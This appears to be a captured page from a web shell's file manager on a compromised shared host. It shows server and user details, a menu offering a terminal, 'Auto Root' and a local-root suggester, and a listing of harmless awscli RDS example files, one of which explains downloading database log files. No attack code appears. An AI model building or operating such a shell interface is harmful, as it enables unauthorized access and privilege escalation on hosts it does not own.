Linux worldls-302.fr.planethoster.net 4.18.0-553.8.1.lve.el7h.x86_64 #1 SMP Thu Jul 4 15:19:33 UTC 2024 x86_64
LiteSpeed
Server IP : 10.185.0.203 & Your IP : 216.73.217.14
Domains :
Cant Read [ /etc/named.conf ]
User : gerathty
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
python2.7 /
site-packages /
awscli /
examples /
rds /
Delete
Unzip
Name
Size
Permission
Date
Action
add-tag-to-resource.rst
780
B
-rw-r--r--
2017-04-04 16:39
create-db-instance.rst
1.98
KB
-rw-r--r--
2017-04-04 16:39
create-db-security-group.rst
695
B
-rw-r--r--
2017-04-04 16:39
create-option-group.rst
778
B
-rw-r--r--
2017-04-04 16:39
describe-db-instances.rst
3.66
KB
-rw-r--r--
2017-04-04 16:39
download-db-log-file-portion.rst
696
B
-rw-r--r--
2017-04-04 16:39
Save
Rename
**How to download your log file** By default, this command will only download the latest part of your log file:: aws rds download-db-log-file-portion --db-instance-identifier myinstance \ --log-file-name log.txt --output text > tail.txt In order to download the entire file, you need `--starting-token 0` parameter:: aws rds download-db-log-file-portion --db-instance-identifier myinstance \ --log-file-name log.txt --starting-token 0 --output text > full.txt Note that, the downloaded file may contain several extra blank lines. They appear at the end of each part of the log file while being downloaded. This will generally not cause any trouble in your log file analysis.